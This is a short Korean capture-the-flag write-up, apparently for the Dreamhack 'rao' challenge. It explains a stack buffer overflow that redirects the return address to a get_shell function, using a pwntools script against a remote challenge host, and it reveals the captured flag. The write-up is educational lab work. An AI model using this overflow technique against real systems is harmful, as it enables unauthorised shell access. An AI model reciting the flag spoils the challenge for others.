rao안에 여러 함수가 있는데 보니까 get_shell함수를 어떻게든 실행시켜야 될 것 같다.
get_shell 함수에선 execve(cmd, args, NULL); 이 있는데 이는 cmd창을 여는 것으로 보인다.

IDA로 열어서 확인해보자.
열어보니 main함수엔 별 게 없다. init과 printf,scanf만 하고 끝난다.
scanf를 이용해 무언가를 해봐야 할 것 같다.

main함수가 리턴되면서 돌아가는 주소는 rbp아래에 있다.
IDA에서 get_shell함수에 들어가 보면 시작 주소가 4006aa라고 나와있다.

main함수가 시작할 때 rbp에서 0x30만큼 멀어지고
scanf할 때 rbp+var_30 = rbp-0x30에서 배열이 시작되므로
코드를 짤 준비가 되었다.

--------------------------------------
from pwn import *

p=remote('host3.dreawmhack.games',15046)

d= b'A'*0x30 + b'A'*8 #8바이트를 더 미는 이유는 rbp때문이다. rbp를 건너야 주소가 나온다.
d += p64(0x4006aa)

p.recv() #recvline을 하니까 안된다. printf할 때 \n이 없어서 그런건가 보다
p.sendline(d)
p.interactive()
----------------------------------------

이렇게 하면 이제 cmd를 입력할 수 있게 되었다.
ls를 쳐보니 flag가 보인다.
cat flag를 쳐보니
DH{5f47cd0e441bdc6ce8bf6b8a3a0608dc}
가 나온다!!!